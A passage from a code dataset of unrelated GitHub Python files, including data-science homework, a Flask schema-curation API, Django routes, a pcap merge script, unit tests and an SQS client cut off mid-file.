['AMT_INCOME_TOTAL']\nplt_by = ['CNT_CHILDREN_GROUP']\n\napp_train.boxplot(column=plt_column, by = plt_by, \n showfliers = False, figsize=(12,12))\nplt.suptitle('')\nplt.show()\n\n\n#%%\n#3\ndata_mean = app_train['AMT_INCOME_TOTAL'].mean()\ndata_std = app_train['AMT_INCOME_TOTAL'].std()\napp_train['AMT_INCOME_TOTAL_Z_BY_CHILDREN_GRP-TARGET'] = grouped_df.apply(lambda x: (x-data_mean)/data_std)\napp_train[['AMT_INCOME_TOTAL','AMT_INCOME_TOTAL_Z_BY_CHILDREN_GRP-TARGET']].head()\n\n\n","repo_name":"chiyu1468/2nd-ML100Days","sub_path":"homework/Day_008_HW.py","file_name":"Day_008_HW.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41604399385","text":"from terrain import Tile as t\nfrom rover import Rover as r\nfrom planet import Planet as p\n\ndef load_level(filename):\n\t\"\"\"\n\tLoads the level and returns an object of your choosing\n\t\"\"\"\n\ttile_content=[]\n\twith open(filename,'r') as game:\n\t\tread=game.readlines()\n\t\tfor line in read:\n\t\t\tline=line.strip('\\n')\n\t\t\tif 'name' in line:\n\t\t\t\tname,true_name=line.split(',')\n\t\t\t\ttile_content.append(true_name)\n\t\t\telif 'width' in line:\n\t\t\t\twidth,parameter_1=line.split(',')\n\t\t\t\tno_1=int(parameter_1)\n\t\t\t\ttile_content.append(no_1)\n\t\t\telif 'height' in line:\n\t\t\t\theight,parameter_2=line.split(',')\n\t\t\t\tno_2=int(parameter_2)\n\t\t\t\ttile_content.append(no_2)\n\t\t\telif 'rover' in line:\n\t\t\t\trover,x_coordinate,y_coordinate=line.split(',')\n\t\t\t\tx=int(x_coordinate)\n\t\t\t\ty=int(y_coordinate)\n\t\t\t\ttile_content.append(x)\n\t\t\t\ttile_content.append(x)\n\t\t\telif 'plains' in line:\n\t\t\t\tset_for_tile=line.split(',')\n\t\t\t\tif len(set_for_tile)==2:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\t\telif len(set_for_tile)==3:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1:]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\telif 'shaded' in line:\n\t\t\t\tset_for_tile=line.split(',')\n\t\t\t\tif len(set_for_tile)==2:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\t\telif len(set_for_tile)==3:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1:]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\treturn tile_content\n","repo_name":"Altoid76/MyHomeworks","sub_path":"Games/Rover/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70145099690","text":"# -*- coding: utf-8 -*-\nimport datetime\n\n# Almacena el último id \nlast_id = 0\nclass Mensaje:\n \"\"\" Representa un mensaje, en una bandeja de entrada;\n Se puede agregar,Editar y eliminar un mensaje. \"\"\"\n \n def __init__(self,from_number=\"\",time_arrived=\"\",text_of_sms=\"\",has_been_viewed=\"\"):\n \"\"\"\n inicializando un mensaje con el valor de from_number,\n time_arrived,text_of_sms,has_been_viewed enviadas por el usuario. \n Automáticamente inserta la fecha de creación y un id unico.\n \"\"\"\n self.creation_date = datetime.date.today()\n global last_id\n last_id += 1\n self.id = last_id\n self.from_number = from_number\n self.time_arrived = datetime.date.today()\n self.text_of_sms = text_of_sms\n self.has_been_viewed = False\n\n\n def search(self, filter):\n \"\"\"\n Determina si el mensaje está contenida en el valor\n del filtro (distingue mayúsculas de minúsculas). \n Retorna True si es igual o False en caso contrario.\n \"\"\"\n return filter in self.text_of_sms or filter in self.has_been_viewed\n\n ","repo_name":"EvoraHn/App_Mensajer-a_Sms","sub_path":"mensaje.py","file_name":"mensaje.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7621225999","text":"file = open(\"inputs.txt\", \"r\")\nvalues = file.read()\nrounds = values.splitlines()\n\nroundsarray = []\ntotalcalories = []\ntotal = 0\n\nfor moves in rounds:\n opponent, mymove = moves.split(' ')\n roundsarray.append([opponent, mymove])\n\nprint(roundsarray)\n\npoints = 0\nfor round in roundsarray:\n if round[1] == 'X':\n points = points + 1\n elif round[1] == 'Y':\n points = points + 2\n elif round[1] == 'Z':\n points = points + 3\n\n if round[0] == 'A' and round[1] == 'X':\n points = points+3\n elif round[0] == 'B' and round[1] == 'Y':\n points = points+3\n elif round[0] == 'C' and round[1] == 'Z':\n points = points+3\n elif round[0] == 'A' and round[1] == 'Y':\n points = points+6\n elif round[0] == 'A' and round[1] == 'Z':\n points = points+0\n elif round[0] == 'B' and round[1] == 'X':\n points = points+0\n elif round[0] == 'B' and round[1] == 'Z':\n points = points+6\n elif round[0] == 'C' and round[1] == 'X':\n points = points+6\n elif round[0] == 'C' and round[1] == 'Y':\n points = points+0\n\nprint(points)\n","repo_name":"ssabhijith2000/advent-of-code","sub_path":"day2/qn3.py","file_name":"qn3.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36535199343","text":"import torch\nfrom torch.utils.data import Dataset\n\n\nimport os\nimport cv2\nimport numpy as np\n\n\nclass COCODataset(Dataset):\n def __init__(\n self,\n annot_path,\n img_size=416,\n ):\n\n self.img_size = img_size\n self.annot_path = annot_path\n self.annotations = self.load_annotations()\n\n\n\n\n def load_annotations(self):\n\n final_annotations = []\n with open(self.annot_path, 'r') as f:\n txt = f.read().splitlines()\n annotations = [line.strip() for line in txt if len(line.strip().split()[1:]) != 0]\n \n \n for annotation in annotations:\n line = annotation.split()\n image_path, index = \"\", 1\n for i, one_line in enumerate(line):\n \n if not one_line.replace(\",\",\"\").isnumeric():\n if image_path != \"\": image_path += \" \"\n image_path += one_line\n else:\n index = i\n break\n \n if not os.path.exists(image_path):\n raise KeyError(f\"{image_path} does not exist ... \")\n \n final_annotations.append([image_path, line[index:]])\n\n return final_annotations\n\n\n def __len__(self):\n return len(self.annotations)\n\n def __getitem__(self, idx):\n item = self.annotations[idx]\n\n img_path = item[0]\n bboxes = item[1]\n\n detections = []\n for i in range(len(bboxes)):\n detections.append([int(item) for item in bboxes[i].split(\",\") ])\n\n return img_path, np.array(detections)\n\n","repo_name":"151ali/triton-inference-server-examples","sub_path":"evaluation/detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34376713813","text":"\"\"\"collegeManagement URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom cmsapp.views import home,showdept,adddept,student,delete,addstudent,deleteStudent,search\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home,name=\"home\"),\n path('showdept/',showdept,name=\"showdept\"),\n path('adddept',adddept,name=\"adddept\"),\n path('student',student,name=\"student\"),\n path('delete/',delete,name='delete'),\n path('addstudent',addstudent,name=\"addstudent\"),\n path('deleteStudent/',deleteStudent,name='deleteStudent'),\n path('search',search,name=\"search\")\n]\n","repo_name":"rahul-bhatia/Django-CollegeManagementSystem","sub_path":"collegeManagement/collegeManagement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74305939369","text":"from recombination import offspring\nimport random\n\n\ndef mutation(offspring,length,iterations,n_iteration):\n Basemutationrate = 1\n C = 1000\n Newmutationrate = Basemutationrate /(1 + C*(iterations/n_iteration))\n r1 = random.randint(length)\n offspring.vector[r1] = offspring.vector[r1] + Newmutationrate*random.normal(0,1)\n e= offspring\n\n return e\n\n\n","repo_name":"melikaraad/Genetic_Algorithm","sub_path":"main_code/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11831374954","text":"\"\"\"Module for main Flask application.\"\"\"\n\nfrom http import HTTPStatus\nimport json\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Any, Tuple\nimport urllib\n\nfrom flask import Flask, abort, jsonify, request\nfrom flask_cors import CORS\nfrom pyinflect import getInflection\nimport requests\nfrom requests import RequestException\nfrom sdf.ontology import ontology\nimport spacy\nimport yaml\n\nfrom pycurator.common.config import settings\nfrom pycurator.common.logger import return_logger\nfrom pycurator.common.paths import (\n EVENT_REC_DIR,\n KGTK_EVENT_CACHE,\n KGTK_REFVAR_CACHE,\n LOG_DIR,\n SCHEMA_DIR,\n)\nfrom pycurator.flask_backend import make_yaml\nfrom pycurator.flask_backend.event_prediction import init_embeddings, init_ss_model, request_top_n\nfrom pycurator.flask_backend.utils import consistent_refvars, contains_cycle, get_verb_lemma\nfrom pycurator.flask_backend.wikidata_linking import (\n filter_duplicate_candidates,\n get_request_kgtk,\n wikidata_topk,\n)\nfrom pycurator.gpt2_component.filter import DefaultCriteria\nfrom pycurator.gpt2_component.gpt2 import convert_sequence_to_text\n\nPARENT_DIR = Path(__file__).resolve().parent\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config[\"CORS_HEADERS\"] = \"Content-Type\"\n\nnlp = spacy.load(\"en_core_web_md\")\n\nlogger = return_logger(LOG_DIR / Path(\"app.log\"))\n\n# Resources initialization for sentence similarity model\nSS_MODEL = init_ss_model()\nDEFINITION_EMBEDDINGS, TEMPLATE_EMBEDDINGS = init_embeddings(SS_MODEL)\n\n\n@app.route(\"/\")\ndef index() -> str:\n \"\"\"Root page of Flask API.\n\n Returns:\n A test message.\n \"\"\"\n return \"What I think a REST API is supposed to be in flask (probably wrong)!\"\n\n\n@app.route(\"/api/get_slots\", methods=[\"GET\"])\ndef get_slots() -> Any:\n \"\"\"Gets slots and their type constraints, for a given primitive subtype.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n event_primitive = request.args.get(\"event_primitive\")\n primitive = ontology.get_default_event(event_primitive)\n event_args = ontology.events[primitive].args\n slots = list(event_args)\n constraints = [sorted(arg.constraints) for arg in event_args.values()]\n return {\"slots\": slots, \"constraints\": constraints}\n\n\n@app.route(\"/api/get_all_primitives\", methods=[\"GET\"])\ndef get_all_primitives() -> Any:\n \"\"\"Gets all primitive subtypes, along with their subsubtypes and default description.\n\n Returns:\n A JSON response.\n \"\"\"\n primitives = []\n default_subtypes = sorted(set((e.type, e.subtype) for e in ontology.events.values()))\n for event_type, subtype in default_subtypes:\n type_subtype = f\"{event_type}.{subtype}\"\n primitives.append(\n {\n \"type\": type_subtype,\n \"subsubtypes\": ontology.get_event_subcats(event_type, subtype),\n \"description\": ontology.events[ontology.get_default_event(type_subtype)].definition,\n }\n )\n return {\"primitives\": primitives}\n\n\n@app.route(\"/api/get_top3\", methods=[\"GET\"])\ndef get_top3() -> Any:\n \"\"\"Gets top 3 primitive subtypes, given an English phrase.\n\n This currently relies on a sentence similarity model.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n\n description: str = request.args.get(\"event_description\", default=\"\")\n if not description:\n abort(HTTPStatus.BAD_REQUEST)\n\n json_return = request_top_n(\n description,\n n=3,\n ss_model=SS_MODEL,\n definition_embeddings=DEFINITION_EMBEDDINGS,\n template_embeddings=TEMPLATE_EMBEDDINGS,\n )\n\n return jsonify(json_return)\n\n\n@app.route(\"/api/save_schema\", methods=[\"POST\"])\ndef save_schema() -> Tuple[Any, int]:\n \"\"\"Creates a schema from collected information.\n\n Returns:\n A JSON response of the schema filename and the schema itself. If the provided schema\n contains a cycle, an error message is returned instead.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n schema_id = request.json[\"schema_id\"]\n schema_name = request.json[\"schema_name\"]\n schema_dscpt = request.json[\"schema_dscpt\"]\n events = request.json[\"events\"]\n for event in events:\n if \"args\" in event and event[\"args\"]:\n for arg in event[\"args\"]:\n if \"reference\" in arg and arg[\"reference\"] is None:\n del arg[\"reference\"]\n links = request.json[\"links\"]\n tracking = request.json[\"tracking\"]\n\n if contains_cycle(events, links):\n json_return = {\"fname\": \"err\", \"output\": \"cycle in graph\"}\n return json_return, HTTPStatus.BAD_REQUEST\n if not consistent_refvars(events):\n json_return = {\"fname\": \"err\", \"output\": \"refvar constraints not consistent\"}\n return json_return, HTTPStatus.BAD_REQUEST\n\n yaml_file = make_yaml.save_schema(\n make_yaml.create_schema(\n events=events,\n links=links,\n tracking=tracking,\n schema_id=schema_id,\n schema_name=schema_name,\n schema_dscpt=schema_dscpt,\n ),\n output_directory=SCHEMA_DIR,\n )\n\n yaml_output = yaml_file.read_text()\n json_return = {\"fname\": yaml_file.stem, \"output\": yaml_output}\n return json_return, HTTPStatus.CREATED\n\n\n@app.route(\"/api/get_saved_schemas\", methods=[\"GET\"])\ndef get_saved_schemas() -> Any:\n \"\"\"Lists file and display names of all saved schemas.\n\n File extensions are stripped, and the names are sorted.\n\n Returns:\n A JSON response.\n \"\"\"\n schema_paths = sorted(p for p in SCHEMA_DIR.glob(\"*.yaml\"))\n display_files = []\n for schema_path in schema_paths:\n with open(schema_path) as f:\n content = yaml.safe_load(f)[0]\n schema_id = content[\"schema_id\"]\n schema_name = content[\"schema_name\"]\n schema_dscpt = content[\"schema_dscpt\"]\n timestamp = content[\"schema_version\"].split(\"-\")\n time_stamp = \"-\".join(timestamp[:3]) + \", \" + \":\".join(timestamp[3:6])\n\n augmentation_flag = os.path.exists(EVENT_REC_DIR / f\"{schema_path.stem}.json\")\n display_files.append(\n {\n \"file\": schema_path.stem,\n \"schema_id\": schema_id,\n \"schema_name\": schema_name,\n \"schema_dscpt\": schema_dscpt,\n \"timestamp\": time_stamp,\n \"augmentation_flag\": augmentation_flag,\n }\n )\n return {\"schemaFiles\": display_files}\n\n\n@app.route(\"/api/get_schema\", methods=[\"GET\"])\ndef get_schema() -> Any:\n \"\"\"Loads a saved schema and event recommendations (if any) from two files.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n requested_file = request.args.get(\"schemaFile\")\n with (SCHEMA_DIR / f\"{requested_file}.yaml\").open() as y_file:\n yaml_output = yaml.safe_load(y_file)[0]\n events = []\n for event_index, step in enumerate(yaml_output[\"steps\"], start=1):\n if \"required\" not in step:\n step[\"required\"] = True\n event = {\n \"event_primitive\": step[\"primitive\"],\n \"event_text\": step[\"id\"],\n \"id_num\": event_index,\n \"args\": step[\"slots\"],\n \"required\": step[\"required\"],\n \"comment\": step.get(\"comment\", None),\n \"reference\": step.get(\"reference\", None),\n }\n events.append(event)\n order = []\n for order_pair in yaml_output[\"order\"]:\n order.append([order_pair[\"before\"], order_pair[\"after\"]])\n\n rec_events = []\n try:\n with (EVENT_REC_DIR / f\"{requested_file}.json\").open() as rec_file:\n recommendations = json.load(rec_file)\n for key in recommendations[\"events\"].keys():\n rec_list = [key]\n rec_list.extend(recommendations[\"events\"][key])\n rec_events.append(rec_list)\n except IOError:\n print(f\"Recommendations not found for {requested_file}\")\n\n yaml_response = {\n \"schema_id\": yaml_output[\"schema_id\"],\n \"schema_name\": yaml_output[\"schema_name\"],\n \"schema_dscpt\": yaml_output[\"schema_dscpt\"],\n \"events\": events,\n \"order\": order,\n \"rec_events\": rec_events,\n }\n return yaml_response\n\n\n@app.route(\"/api/disambiguate_verb_kgtk\", methods=[\"POST\"])\ndef disambiguate_verb_kgtk() -> Any:\n \"\"\"Disambiguates verbs from event description and return candidate qnodes.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n event_description = request.json[\"event_description\"]\n cleaned_description = event_description.replace(\"/\", \" \").replace(\"_\", \" \")\n event_verb = get_verb_lemma(nlp, cleaned_description)\n cached_file = KGTK_EVENT_CACHE / f\"{event_verb}.json\"\n if cached_file.is_file():\n with open(cached_file) as f:\n return json.load(f)\n kgtk_json = get_request_kgtk(event_verb)\n event_verb_participle = getInflection(event_verb, tag=\"VBG\")\n if event_verb_participle and event_verb_participle != event_verb:\n kgtk_json += get_request_kgtk(event_verb_participle[0])\n if not kgtk_json:\n return {\"event_verb\": kgtk_json, \"options\": []}\n unique_candidates = filter_duplicate_candidates(kgtk_json)\n options = []\n top3 = wikidata_topk(SS_MODEL, cleaned_description, unique_candidates, k=3)\n for candidate in top3:\n option = {\n \"qnode\": candidate[\"qnode\"],\n \"rawName\": candidate[\"label\"][0],\n \"definition\": candidate[\"description\"][0],\n }\n if option not in options:\n options.append(option)\n response = {\"event_verb\": event_verb, \"options\": options}\n with open(cached_file, \"w\") as f:\n json.dump(response, f)\n return response\n\n\n@app.route(\"/api/disambiguate_refvar_kgtk\", methods=[\"POST\"])\ndef disambiguate_refvar_kgtk() -> Any:\n \"\"\"Disambiguates refvar with KGTK webserver API.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n refvar = request.json[\"refvar\"].lower()\n cleaned_refvar = refvar.replace(\"/\", \" \").replace(\"_\", \" \")\n cached_file = KGTK_REFVAR_CACHE / f\"{cleaned_refvar}.json\"\n if cached_file.is_file():\n with open(cached_file) as f:\n return json.load(f)\n kgtk_json = get_request_kgtk(cleaned_refvar)\n if not kgtk_json:\n return {\"event_verb\": kgtk_json, \"options\": []}\n if len(cleaned_refvar.split()) < 2:\n lemma_refvar = nlp(cleaned_refvar)[0].lemma_\n if lemma_refvar != cleaned_refvar:\n kgtk_json += get_request_kgtk(lemma_refvar)\n unique_candidates = filter_duplicate_candidates(kgtk_json)\n options = []\n top3 = wikidata_topk(SS_MODEL, refvar, unique_candidates, k=3)\n for candidate in top3:\n # description can be empty sometimes on less popular qnodes\n definition = \"\" if len(candidate[\"description\"]) < 1 else candidate[\"description\"][0]\n option = {\n \"qnode\": candidate[\"qnode\"],\n \"rawName\": candidate[\"label\"][0],\n \"definition\": definition,\n }\n if option not in options:\n options.append(option)\n response = {\"refvar\": refvar, \"options\": options}\n with open(cached_file, \"w\") as f:\n json.dump(response, f)\n return response\n\n\n@app.route(\"/api/get_gpt2_suggestions\", methods=[\"GET\"])\ndef get_gpt2_suggestions() -> Any:\n \"\"\"Gets suggestions from GPT-2 server.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n logging.error(\"Request missing URL parameters\")\n abort(HTTPStatus.BAD_REQUEST)\n schema_name = request.args.get(\"schema_name\")\n schema_dscpt = request.args.get(\"schema_dscpt\")\n events = request.args.getlist(\"events\")\n if not schema_name or not schema_dscpt:\n logging.error(\"Request missing name or description\")\n abort(HTTPStatus.BAD_REQUEST)\n\n text = convert_sequence_to_text(\n schema_name=schema_name,\n schema_desc=schema_dscpt,\n sequence=events,\n )\n text_formatted = urllib.parse.quote(text)\n\n request_url = (\n f\"http://{settings.gpt2_server}.example.org:5001/api/get_prediction?text={text_formatted}\"\n )\n try:\n request_response = requests.get(request_url, timeout=30)\n except RequestException as ex:\n logger.error(ex)\n abort(HTTPStatus.INTERNAL_SERVER_ERROR)\n if request_response.status_code != HTTPStatus.OK:\n logger.error(\"GPT-2 server returned status code %d\", request_response.status_code)\n abort(HTTPStatus.INTERNAL_SERVER_ERROR)\n predictions = request_response.json()[\"predictions\"]\n\n gpt2_filter = DefaultCriteria(existing_events=set(events), keep=5)\n suggestions = sorted(gpt2_filter.meet_criteria(predictions))\n\n response = {\"suggestions\": suggestions}\n return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, load_dotenv=False)\nelse:\n gunicorn_logger = logging.getLogger(\"gunicorn.error\")\n logger.level = gunicorn_logger.level\n","repo_name":"isi-vista/MASC","sub_path":"pycurator/flask_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23975352981","text":"#importing bokeh and pandas\nfrom bokeh.plotting import figure, output_file, show\nimport pandas\n\n#prepare some data\n\ndf = pandas.read_excel(\"http://pythonhow.com/data/verlegenhuken.xlsx\", sheet_name=0)\npressures = df[\"Pressure\"]/10\ntemperatures = df[\"Temperature\"]/10\n\n#prepare the output file\noutput_file(\"Weather_data.html\")\n\n#create a figure object\np=figure(plot_width=800, plot_height=700, tools='pan')\n\np.title.text=\"Temperature and Air Pressure\"\np.title.text_color=\"Black\"\np.title.text_font=\"times\"\np.title.text_font_style=\"bold\"\np.xaxis.minor_tick_line_color=None\np.yaxis.minor_tick_line_color=None\np.xaxis.axis_label=\"Temperature (Celsius)\"\np.yaxis.axis_label=\"Pressure (hPa)\"\n\n#create line plot\np.triangle(temperatures, pressures)\n\n#write the plot in the figure object\nshow(p)","repo_name":"ahpehgit/python-scripts","sub_path":"jupyter/bokeh/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13369853058","text":"import time\nimport functools\nimport os\nfrom scapy import *\n\n\ndef log_time(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n result = func(*args, **kwargs)\n end_time = time.time()\n print(\"Time: %f \" % (end_time - start_time))\n return result\n\n return wrapper\n\ndef merge():\n\n path = 'data/abnormal'\n filename = 'output/all.pcap'\n\n fs = os.listdir(path)\n fs = [os.path.join(path, f) for f in fs if f.find('pcap') != -1]\n writer = PcapWriter(filename)\n\n for f in fs:\n try:\n s = PcapReader(f)\n while True:\n try:\n p = s.read_packet()\n writer.write(p)\n except EOFError:\n break\n s.close()\n writer.flush()\n except Exception as e:\n print('Error', e)\n\n writer.flush()\n writer.close()\n\n\nif __name__ == \"__main__\":\n merge()\n","repo_name":"kangguangli/cryptography","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22916751828","text":"# -*- encoding: utf-8 -*-\n'''\n Settings used for parallel computing with the IPython cluster interface.\n'''\n\n__author__=\"Artur Glavic\"\n__credits__=[]\nfrom plot_script.plotpy_info import __copyright__, __license__, __version__, __maintainer__, __email__ #@UnusedImport\n__status__=\"Production\"\n\nimport os\n\n\n# keyword arguments of the Client function call\nCLIENT_KW=dict(\n ## ZMQ url of path to .json file\n #url_or_file=\"tcp://192.168.2.2:37377\", \n #exec_key=\"bc0a6222-f7d8-4b61-9a3a-4113cb02cd86\", \n ### ipython profile of the cluster controller\n #profile='netcluster', \n #profile_dir=None, \n #sshserver='glavic@192.168.2.2', \n timeout=5,\n ipython_dir=os.path.expanduser('~/.config/ipython'),\n #\n )\n\nCLUSTER_PLOTPY_DIR=os.path.abspath(os.path.split(os.path.split(__file__)[0])[0])#\"/home/glavic/plot-script\"#","repo_name":"aglavic/plotpy","sub_path":"plot_script/config/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74381120850","text":"# -*- coding: utf-8 -*-\n\nfrom five import grok\nfrom zope.component import queryMultiAdapter\nfrom zope.cachedescriptors.property import CachedProperty\nfrom sd.contents.interfaces import IStructuredDocument, IStructuredItem\nfrom sd.contents.interfaces import IDynamicStructuredItem\nfrom sd.rendering.interfaces import IStructuredView, IRendererResolver\nfrom sd.common.adapters.interfaces import IContentQueryHandler\n\ngrok.templatedir('templates')\n\n\nclass DocumentContentProvider(grok.View):\n \"\"\"Access to a document contents\n \"\"\"\n grok.require('zope2.View')\n grok.name('sd.document.onepage')\n grok.context(IStructuredDocument)\n grok.implements(IStructuredView)\n\n @CachedProperty\n def _contents(self):\n contentFilter = {\"object_provides\":\n 'sd.contents.interfaces.base.IStructuredItem'}\n handler = IContentQueryHandler(self.context)\n brains = handler and handler.query_contents(**contentFilter) or []\n return [brain.getObject() for brain in brains]\n\n def contents(self, *args, **kwargs):\n return self._contents\n\n\nclass GenericView(grok.View):\n \"\"\"The AT view of the SimpleParagraph\n \"\"\"\n grok.name('sd.generic_view')\n grok.context(IStructuredItem)\n grok.require('zope2.View')\n\n @CachedProperty\n def body(self):\n resolver = queryMultiAdapter((self.context, self.request),\n IRendererResolver)\n return resolver.renderer and resolver.renderer.render() or u\"\"\n","repo_name":"trollfot/sd.app","sub_path":"sd/app/contents/browser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70452281492","text":"import unittest\n\n# time = O(nlogn) | space = O(n) where n = len(arr)\n# solution: sort array.\nclass Solution:\n\n\tdef absolute_value_sort(self, arr):\n\t\t'''\n\t\tgiven an array of integers arr, write a function absSort(arr), that sorts the array according to the absolute values of the numbers in arr.\n\t\tIf two numbers have the same absolute value, sort them according to sign, where the negative numbers come before the positive numbers.\n\n\t\tparameters:\n\t\t\tarr: List[int]\n\t\treturn:\n\t\t\tresult: List[int]\n\t\t'''\n\t\treturn sorted(arr, key=lambda x: (abs(x), x))\n\n\nclass_obj = Solution()\n\n\nclass test(unittest.TestCase):\n\t\n\tdef test_1(self):\n\t\tself.assertEqual(class_obj.absolute_value_sort([2, -7, -2, -2, 0]), [0, -2, -2, 2, -7])\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"anthonynguyen2021/NonLeetCode","sub_path":"absolute_value_sort_Pramp/absolute_value_sort_slick.py","file_name":"absolute_value_sort_slick.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33647759082","text":"import pytest\nimport uuid\nimport random\nfrom time import sleep\n\nfrom core.decorator import timer\n\n\ndef delay_value(from_=45, to=55):\n return random.randrange(from_, to)\n\n\ndef test_timer():\n timer_label = uuid.uuid4()\n\n class TestClass:\n def __init__(self, delay):\n self.delay = delay\n\n @timer(label=timer_label)\n def do_nothing(self):\n sleep(self.delay/1000.0)\n\n delay = delay_value()\n tc = TestClass(delay)\n tc.do_nothing()\n\n delay2 = delay_value()\n tc2 = TestClass(delay2)\n tc2.do_nothing()\n\n assert tc.timer_measurements[timer_label] == pytest.approx(delay, rel=1e-2)\n assert tc2.timer_measurements[timer_label] == pytest.approx(delay2, rel=1e-2)\n\n\ndef test_timer_wo_label():\n delay = delay_value()\n\n class TestClass:\n @timer()\n def timer_use_function_name(self):\n sleep(delay/1000.0)\n\n tc = TestClass()\n tc.timer_use_function_name()\n\n assert tc.timer_measurements['timer_use_function_name'] == pytest.approx(delay, rel=1e-2)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/unit_tests/test_decorator.py","file_name":"test_decorator.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"709960004","text":"import atexit\nfrom datetime import date\nfrom flask import current_app\nimport logging\nimport os\nimport platform\nfrom pysqs_extended_client.SQSClientExtended import SQSClientExtended\nimport threading\nimport time\nfrom uuid import uuid4\n\nclass sqs_cl():\n\n n_resp_queue = 0\n\n def __init__(self):\n self.log(\"!!!!!!! create new sqs\")\n\n atexit.register(self.cleanup) # This works with real threading - but not with eventlet\n\n config = current_app.config\n\n self.sqs_client = SQSClientExtended(config['AWS_ACCESS_KEY'], config['AWS_SECRET_KEY'], config['AWS_REGION'], config['BUCKET_NAME'])\n self.sqs_client.set_always_through_s3(False)\n \n self.queue_rqs = {}\n for acnt in config['ACCOUNTS']:\n req_qname = (\n \"cyg\"\n + \"-\" + config['UNIDATA_SERVER_ID'].replace(\"-\",\"_\")\n + \"-rq\"\n + \"-\" + acnt\n )\n queue = self.sqs_client.sqs.get_queue_url(QueueName = req_qname)['QueueUrl']\n self.log(\"got existing queue \"+queue)\n self.queue_rqs[acnt] = queue\n\n self.create_resp_queue()\n self.server_name = platform.node()\n self.reqn = 0\n\n def __del__(self):\n self.cleanup()\n\n def get_queue_resp(self):\n idle_time = time.time() - self.last_qtime\n if idle_time >= 120:\n # Check that can read from queue - otherwise create a new one\n # Copes with queue being deleted by server tidy up process\n try:\n dummy = self.sqs_client.receive_message(self.queue_resp,1,0)\n except:\n self.create_resp_queue()\n self.last_qtime = time.time()\n return self.queue_resp\n\n def create_resp_queue(self):\n config = current_app.config\n self.n_resp_queue += 1\n resp_qname = (\n \"cyg\"\n + \"-\" + 